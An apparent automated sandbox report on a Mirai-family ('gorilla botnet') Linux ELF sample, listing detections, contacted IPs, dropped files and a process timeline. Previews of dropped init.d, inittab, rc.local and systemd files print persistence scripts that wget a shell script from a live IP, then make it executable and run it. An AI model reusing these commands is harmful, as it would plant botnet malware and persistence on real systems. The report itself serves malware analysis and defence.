x86_64.nn.elf | 39% | Virustotal |
x86_64.nn.elf | 42% | ReversingLabs | Linux.Backdoor.Mirai
x86_64.nn.elf | 100% | Avira | EXP/ELF.Mirai.W
x86_64.nn.elf | 100% | Joe Sandbox ML |

Dropped files:

Source | Detection | Scanner | Label
/etc/init.d/sh | 3% | ReversingLabs | Text.Browser.Generic
/etc/init.d/system | 3% | ReversingLabs | Text.Browser.Generic
/etc/rc.local | 0% | ReversingLabs |
/etc/rc.local | 0% | Virustotal |
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://94.156.227.233/curl.sh | x86_64.nn.elf | false | | high
http://94.156.227.233/lol.sh | x86_64.nn.elf | false | | high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | x86_64.nn.elf | false | | high
http://94.156.227.233/ | x86_64.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr | false | | high
          IP | Domain | Country | ASN | ASN Name | Malicious
          111.125.55.91 | unknown | Japan | 9614 | OCTOitaCableTelecomColtdJP | false
          154.216.19.139 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | false
          62.225.116.100 | unknown | Germany | 3320 | DTAGInternetserviceprovideroperationsDE | false
          122.159.244.47 | unknown | China | 4837 | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | false
          191.141.13.246 | unknown | Brazil | 26615 | TIMSABR | false
          28.27.182.234 | unknown | United States | 7922 | COMCAST-7922US | false
          73.218.255.124 | unknown | United States | 7922 | COMCAST-7922US | false
          156.144.18.206 | unknown | United States | 3743 | ARCEL-2US | false
          215.52.26.4 | unknown | United States | 721 | DNIC-ASBLK-00721-00726US | false
          47.141.90.29 | unknown | United States | 5650 | FRONTIER-FRTRUS | false
          94.156.227.234 | unknown | Bulgaria | 57463 | NETIXBG | false
          216.250.19.190 | unknown | United States | 26284 | BADGER-INTERNET-INCUS | false
          35.38.189.105 | unknown | United States | 36375 | UMICH-AS-5US | false
          91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
          91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
          9.129.94.122 | unknown | United States | 3356 | LEVEL3US | false
          223.38.1.80 | unknown | Korea Republic of | 9644 | SKTELECOM-NET-ASSKTelecomKR | false
          219.241.165.108 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
          109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false
          52.84.118.146 | unknown | United States | 16509 | AMAZON-02US | false
          53.236.44.244 | unknown | Germany | 31399 | DAIMLER-ASITIGNGlobalNetworkDE | false
          103.196.5.144 | unknown | India | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false
          116.88.3.27 | unknown | Singapore | 10091 | STARHUB-CABLEStarHubLtdSG | false
          45.126.195.192 | unknown | Australia | 137968 | PSPL-AS-APPen10ServicesPtyLtdAU | false
          205.181.36.236 | unknown | United States | 3356 | LEVEL3US | false
          6.211.13.65 | unknown | United States | 3356 | LEVEL3US | false
          18.242.255.3 | unknown | United States | 16509 | AMAZON-02US | false
          167.167.140.221 | unknown | United States | 51964 | ORANGE-BUSINESS-SERVICES-IPSN-ASNFR | false
          204.76.192.171 | unknown | United States | 16957 | IDAHOPOWER-NETWORKUS | false
          213.55.245.14 | unknown | Switzerland | 15796 | SALT-CH | false
          Match | Associated Sample Name / URL | Detection | Threat Name
          154.216.19.139 | tXcFA8apHU.exe | malicious | Remcos
          154.216.19.139 | x86_64.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | m68k.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | m68k.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | powerpc.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | arm.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | m68k.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | m68k.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | m68k.nn.elf | malicious | Mirai, Okiru
          154.216.19.139 | m68k.nn.elf | malicious | Mirai, Okiru
          94.156.227.234 | x86_64.nn.elf | malicious | Mirai, Okiru
          91.189.91.43 | .i.elf | malicious | Unknown
          91.189.91.43 | spc.elf | malicious | Unknown
          91.189.91.43 | .i.elf | malicious | Unknown
          91.189.91.43 | tftp.elf | malicious | Unknown
          91.189.91.43 | violetx86.elf | malicious | Unknown
          91.189.91.43 | sshd.elf | malicious | Unknown
          91.189.91.43 | bin.sh.elf | malicious | Mirai
          91.189.91.43 | php-fpm | malicious | Unknown
          91.189.91.43 | loligang.m68k.elf | malicious | Mirai
          91.189.91.43 | loligang.arm6.elf | malicious | Mirai
          91.189.91.42 | .i.elf | malicious | Unknown
          91.189.91.42 | spc.elf | malicious | Unknown
          91.189.91.42 | .i.elf | malicious | Unknown
          91.189.91.42 | tftp.elf | malicious | Unknown
          91.189.91.42 | violetx86.elf | malicious | Unknown
          91.189.91.42 | sshd.elf | malicious | Unknown
          91.189.91.42 | bin.sh.elf | malicious | Mirai
          91.189.91.42 | php-fpm | malicious | Unknown
          91.189.91.42 | loligang.m68k.elf | malicious | Mirai
          91.189.91.42 | loligang.arm6.elf | malicious | Mirai
                                                                                No context
          Match | Associated Sample Name / URL | Detection | Threat Name | IP
          DTAGInternetserviceprovideroperationsDE | arm5.nn.elf | malicious | Mirai, Okiru | 217.229.45.57
          DTAGInternetserviceprovideroperationsDE | mipsel.nn.elf | malicious | Mirai, Okiru | 91.18.248.73
          DTAGInternetserviceprovideroperationsDE | sh4.nn.elf | malicious | Mirai, Okiru | 84.148.23.119
          DTAGInternetserviceprovideroperationsDE | b3astmode.sh4.elf | malicious | Mirai | 91.33.180.45
          DTAGInternetserviceprovideroperationsDE | b3astmode.sh4.elf | malicious | Mirai | 2.165.219.165
          DTAGInternetserviceprovideroperationsDE | b3astmode.spc.elf | malicious | Mirai | 217.247.221.226
          DTAGInternetserviceprovideroperationsDE | b3astmode.ppc.elf | malicious | Mirai | 79.237.170.124
          DTAGInternetserviceprovideroperationsDE | b3astmode.x86.elf | malicious | Mirai | 84.137.24.79
          DTAGInternetserviceprovideroperationsDE | jade.sh4.elf | malicious | Mirai | 62.156.228.137
          DTAGInternetserviceprovideroperationsDE | jade.arm.elf | malicious | Mirai | 31.245.105.247
          OCTOitaCableTelecomColtdJP | .5r3fqt67ew531has4231.x86.elf | malicious | Mirai, Moobot, Okiru | 203.213.171.132
          OCTOitaCableTelecomColtdJP | jmhgeojeri.elf | malicious | Unknown | 123.100.221.177
          OCTOitaCableTelecomColtdJP | loligang.mips-20241128-1536.elf | malicious | Mirai | 122.152.91.183
          OCTOitaCableTelecomColtdJP | x86.elf | malicious | Gafgyt, Mirai | 182.173.150.184
          OCTOitaCableTelecomColtdJP | x86_32.nn.elf | malicious | Mirai, Okiru | 101.55.144.96
          OCTOitaCableTelecomColtdJP | jew.mips.elf | malicious | Mirai | 123.50.227.232
          OCTOitaCableTelecomColtdJP | nabarm.elf | malicious | Unknown | 122.152.89.158
          OCTOitaCableTelecomColtdJP | la.bot.m68k.elf | malicious | Unknown | 203.213.162.121
          OCTOitaCableTelecomColtdJP | la.bot.arm.elf | malicious | Unknown | 101.55.163.9
          OCTOitaCableTelecomColtdJP | la.bot.sparc.elf | malicious | Unknown | 203.213.171.139
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | b3astmode.arm.elf | malicious | Mirai | 154.211.34.20
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 154.216.20.243
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | file.exe | malicious | Xmrig | 154.216.20.243
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 154.216.20.243
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | file.exe | malicious | Xmrig | 154.216.20.243
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | jew.m68k.elf | malicious | Unknown | 45.207.239.54
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | Strait STS.vbs | malicious | Remcos, GuLoader | 154.216.18.216
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | mips.elf | malicious | Mirai | 156.226.9.180
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3D | malicious | Phisher | 154.216.20.188
          SKHT-ASShenzhenKatherineHengTechnologyInformationCo | Reqt 83291.vbs | malicious | Remcos, GuLoader | 154.216.18.62
                                                                                No context
          Match | Associated Sample Name / URL | Detection | Threat Name
          /etc/init.d/system | x86_32.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/system | x86_64.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/system | x86_64.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/system | x86_32.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/system | x86_32.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/system | x86_64.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/sh | x86_32.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/sh | x86_64.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/sh | x86_64.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/sh | x86_32.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/sh | x86_32.nn.elf | malicious | Mirai, Okiru
          /etc/init.d/sh | x86_64.nn.elf | malicious | Mirai, Okiru
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):111
                                                                                                        Entropy (8bit):4.663595298101345
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                                                                                        MD5:3290F4F4E0B77B577C59026DEF246CEE
                                                                                                        SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                                                                                        SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                                                                                        SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                        Process:/bin/sh
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):355
                                                                                                        Entropy (8bit):4.416220583499086
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                                                                                        MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                                                                                        SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                                                                                        SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                                                                                        SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                        Joe Sandbox View:
                                                                                                         • Filename: x86_32.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_64.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_64.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_32.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_32.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_64.nn.elf, Detection: malicious
                                                                                                        Reputation:low
                                                                                                        Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):98
                                                                                                        Entropy (8bit):4.615605979741142
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                                                                                        MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                                                                                        SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                                                                                        SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                                                                                        SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                        Joe Sandbox View:
                                                                                                         • Filename: x86_32.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_64.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_64.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_32.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_32.nn.elf, Detection: malicious
                                                                                                         • Filename: x86_64.nn.elf, Detection: malicious
                                                                                                        Reputation:low
                                                                                                        Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):103
                                                                                                        Entropy (8bit):4.612417623467759
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                                                                                        MD5:175C6814BBE06EB5816EFE3FE3934230
                                                                                                        SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                                                                                        SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                                                                                        SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):53
                                                                                                        Entropy (8bit):3.871459242626451
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                                        MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                                        SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                                        SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                                        SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):94
                                                                                                        Entropy (8bit):4.486383977913608
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                                                                                        MD5:CEC61C0CDC61AB271C45B85281469388
SHA1: E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
SHA-256: AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
SHA-512: 71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
Malicious: true
Preview:
    /bin/sh &
    wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &

Process: /tmp/x86_64.nn.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 10
Entropy (8bit): 3.121928094887362
Encrypted: false
SSDEEP: 3:TKH4vn:hv
MD5: 3E2B31C72181B87149FF995E7202C0E3
SHA1: BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256: A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512: 543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Preview:
    #!/bin/sh

Process: /tmp/x86_64.nn.elf
File Type: ASCII text
Category: dropped
Size (bytes): 292
Entropy (8bit): 5.064804988275458
Encrypted: false
SSDEEP: 6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
MD5: 8156A50E9D158639626649BD134E7D5D
SHA1: D95D108656621F4B4F82B93CA0694D66F4A2FEF4
SHA-256: FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
SHA-512: DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
Malicious: false
Preview:
    [Unit]
    Description=Custom Binary and Payload Service
    After=network.target

    [Service]
    ExecStart=/bin/sh
    ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/
    ExecStartPost=/bin/chmod +x /tmp/lol.sh
    ExecStartPost=/tmp/lol.sh
    Restart=on-failure

    [Install]
    WantedBy=multi-user.target

Process: /usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type: ASCII text
Category: dropped
Size (bytes): 76
Entropy (8bit): 3.7627880354948586
Encrypted: false
SSDEEP: 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5: D86A1F5765F37989EB0EC3837AD13ECC
SHA1: D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256: 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512: 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious: false
Preview:
    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
File type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit): 6.310524229392396
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: x86_64.nn.elf
File size: 97'600 bytes
MD5: adf6b23cac984a3a3904655c9b93e95d
SHA1: 6b3eb5ca916435b936af388d0455cc67d40c8ef8
SHA256: 22edd9ca7bb64abffb6ff297dafad627e552a8922c3c442ae81643e828fb0dfe
SHA512: f58fdecf8d876cafc10c7cd15ce74daaeed0cad06a2ccf152046667bc37ff39ba24121345eb47665c596112e9ea7ada9fea01378b3a83288acc758d740338044
SSDEEP: 1536:HPGOa+YLvmjwWrO2w1tH3BRs2d1mi//yvpW123WqCwhJ:HBa+YzmjdrO2mhBRh1mi3yI123Wqp
TLSH: 42933A07B6C0D4FDC45DC2344B6FA13AD562F69D0235B29B27D8FB262F8DE101A2D968
File Content Preview: .ELF..............>.......@.....@........z..........@.8...@.......................@.......@.....pr......pr......................xr......xrQ.....xrQ..............1..............Q.td....................................................H...._.....<..H........

ELF header

Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
Machine: Advanced Micro Devices X86-64
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x400194
Flags: 0x0
ELF Header Size: 64
Program Header Offset: 64
Program Header Size: 56
Number of Program Headers: 3
Section Header Offset: 96960
Section Header Size: 64
Number of Section Headers: 10
Header String Table Index: 9
Section headers

Name       Type      Address   Offset   Size     EntSize  Flags  Flags Description  Link  Info  Align
           NULL      0x0       0x0      0x0      0x0      0x0                       0     0     0
.init      PROGBITS  0x4000e8  0xe8     0x13     0x0      0x6    AX                 0     0     1
.text      PROGBITS  0x400100  0x100    0x13d16  0x0      0x6    AX                 0     0     16
.fini      PROGBITS  0x413e16  0x13e16  0xe      0x0      0x6    AX                 0     0     1
.rodata    PROGBITS  0x413e40  0x13e40  0x3430   0x0      0x2    A                  0     0     32
.ctors     PROGBITS  0x517278  0x17278  0x10     0x0      0x3    WA                 0     0     8
.dtors     PROGBITS  0x517288  0x17288  0x10     0x0      0x3    WA                 0     0     8
.data      PROGBITS  0x5172a0  0x172a0  0x7e0    0x0      0x3    WA                 0     0     32
.bss       NOBITS    0x517a80  0x17a80  0x29e8   0x0      0x3    WA                 0     0     32
.shstrtab  STRTAB    0x0       0x17a80  0x3e     0x0      0x0                       0     0     1
Program headers

Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align     Prog Interpreter  Section Mappings
LOAD       0x0      0x400000         0x400000          0x17270    0x17270      6.3642   0x5    R E                0x100000                    .init .text .fini .rodata
LOAD       0x17278  0x517278         0x517278          0x808      0x31f0       3.7391   0x6    RW                 0x100000                    .ctors .dtors .data .bss
GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x8
Network traffic

Timestamp  Source Port  Dest Port  Source IP  Dest IP

System Behavior

Start time (UTC): 03:22:56
Start date (UTC): 13/12/2024
Path: /tmp/x86_64.nn.elf
Arguments: /tmp/x86_64.nn.elf
File size: 97600 bytes
MD5 hash: adf6b23cac984a3a3904655c9b93e95d

Start time (UTC): 03:22:56
Start date (UTC): 13/12/2024
Path: /tmp/x86_64.nn.elf
Arguments: -
File size: 97600 bytes
MD5 hash: adf6b23cac984a3a3904655c9b93e95d

Start time (UTC): 03:22:56
Start date (UTC): 13/12/2024
Path: /bin/sh
Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 03:22:56
Start date (UTC): 13/12/2024
Path: /bin/sh
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 03:22:56
Start date (UTC): 13/12/2024
Path: /usr/bin/systemctl
Arguments: systemctl enable custom.service
File size: 996584 bytes
MD5 hash: 4deddfb6741481f68aeac522cc26ff4b

Start time (UTC): 03:22:57
Start date (UTC): 13/12/2024
Path: /tmp/x86_64.nn.elf
Arguments: -
File size: 97600 bytes
MD5 hash: adf6b23cac984a3a3904655c9b93e95d

Start time (UTC): 03:22:57
Start date (UTC): 13/12/2024
Path: /bin/sh
Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 03:22:57
Start date (UTC): 13/12/2024
Path: /bin/sh
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/bin/chmod
                                                                                                        Arguments:chmod +x /etc/init.d/system
                                                                                                        File size:63864 bytes
                                                                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:-
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/bin/ln
                                                                                                        Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                                                        File size:76160 bytes
                                                                                                        MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:-
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/bin/chmod
                                                                                                        Arguments:chmod +x /etc/init.d/sh
                                                                                                        File size:63864 bytes
                                                                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:-
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
